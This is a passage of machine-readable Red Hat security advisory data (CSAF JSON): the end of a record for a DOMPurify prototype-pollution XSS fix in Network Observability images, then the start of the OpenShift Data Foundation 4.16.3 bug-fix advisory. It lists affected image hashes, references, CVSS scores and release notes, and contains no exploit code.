"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
rhsa-2024_8113
Vulnerability from csaf_redhat
Published
2024-10-15 08:52
Modified
2024-11-06 07:15
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/\u003cCLUSTER_NAMESPACE\u003e: \u2018\u0027\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019 to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8113",
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2283959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283959"
},
{
"category": "external",
"summary": "2295324",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295324"
},
{
"category": "external",
"summary": "2296521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2296521"
},
{
"category": "external",
"summary": "2300333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300333"
},
{
"category": "external",
"summary": "2302463",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302463"
},
{
"category": "external",
"summary": "2303083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303083"
},
{
"category": "external",
"summary": "2304905",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304905"
},
{
"category": "external",
"summary": "2308445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308445"
},
{
"category": "external",
"summary": "2310370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310370"
},
{
"category": "external",
"summary": "2312055",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312055"
},
{
"category": "external",
"summary": "2315708",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315708"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update",
"tracking": {
"current_release_date": "2024-11-06T07:15:50+00:00",
"generator": {
"date": "2024-11-06T07:15:50+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:8113",
"initial_release_date": "2024-10-15T08:52:38+00:00",
"revision_history": [
{
"date": "2024-10-15T08:52:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-15T08:52:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:15:50+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.16 for RHEL 9",
"product": {
"name": "RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_identification_helper": {
